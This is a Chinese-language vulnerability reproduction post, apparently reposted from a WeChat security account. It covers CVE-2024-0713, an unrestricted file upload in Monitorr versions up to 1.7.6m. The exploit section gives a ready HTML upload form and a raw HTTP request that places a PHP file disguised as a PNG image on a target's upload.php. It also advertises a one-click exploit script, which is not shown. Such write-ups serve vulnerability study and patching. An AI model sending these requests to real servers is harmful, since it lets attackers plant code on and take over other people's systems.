本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。
开发语言:PHP
项目地址:https://github.com/Monitorr/Monitorr
空间测绘
回复“CVE-2024-0713”获取空间测绘语句和漏洞利用脚本
漏洞描述
Monitorr 1.7.6m 中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,攻击可以远程发起。
影响版本
Monitorr ≤ v1.7.6m
漏洞利用
后端会验证上传图片尺寸,所以建议使用HTML上传表单或一键利用脚本。
HTML上传表单
</!DOCTYPE html>
<html>
<head>
<title>File Upload</title>
</head>
<body>
<h2>CVE-2024-0713</h2>
<form action="http://xxx.xxx.xxx/assets/php/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload"/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
上传数据包
POST /assets/php/upload.php HTTP/1.1
Host: 192.168.182.132
Content-Length: 412
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5799.196 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q
Origin: http://192.168.182.132
Referer: http://192.168.182.132/assets/php/monitorr-services_settings.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryMmx988TUuintqO4Q
Content-Disposition: form-data; name="fileToUpload"; filename="2.php"
Content-Type: image/png
phpinfo();
------WebKitFormBoundaryMmx988TUuintqO4Q--
漏洞利用脚本
回复“CVE-2024-0713”获取空间测绘语句和漏洞利用脚本
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2024-0713
https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view
回复“CVE-2024-0713”获取空间测绘语句
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2024-0713 Monitorr 任意文件上传 附一键利用脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论